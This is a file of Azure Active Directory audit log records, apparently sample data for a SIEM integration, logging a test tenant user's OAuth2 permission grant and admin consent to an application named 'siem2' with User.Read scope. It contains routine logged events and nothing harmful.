-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.0571467Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622817"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "db3ce560-1c2f-4c85-b305-55ad6476250f"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.0571467Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622817"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "db3ce560-1c2f-4c85-b305-55ad6476250f"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.IsAppOnly", "OldValue": "", "NewValue": "False"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"NewValue": "", "OldValue": "", "Name": "ConsentContext.Tags"}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622848"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "24524679-8930-4afd-83b8-2dc70aa0a016"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"NewValue": "False", "OldValue": "", "Name": "ConsentContext.IsAppOnly"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622848"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "24524679-8930-4afd-83b8-2dc70aa0a016"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"NewValue": "False", "OldValue": "", "Name": "ConsentContext.IsAppOnly"}, {"NewValue": "True", "OldValue": "", "Name": "ConsentContext.OnBehalfOfAll"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622848"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "24524679-8930-4afd-83b8-2dc70aa0a016"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "User.ObjectID", "OldValue": "", "NewValue": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "User.UPN", "OldValue": "", "NewValue": "asr@testsiem.onmicrosoft.com"}, {"Name": 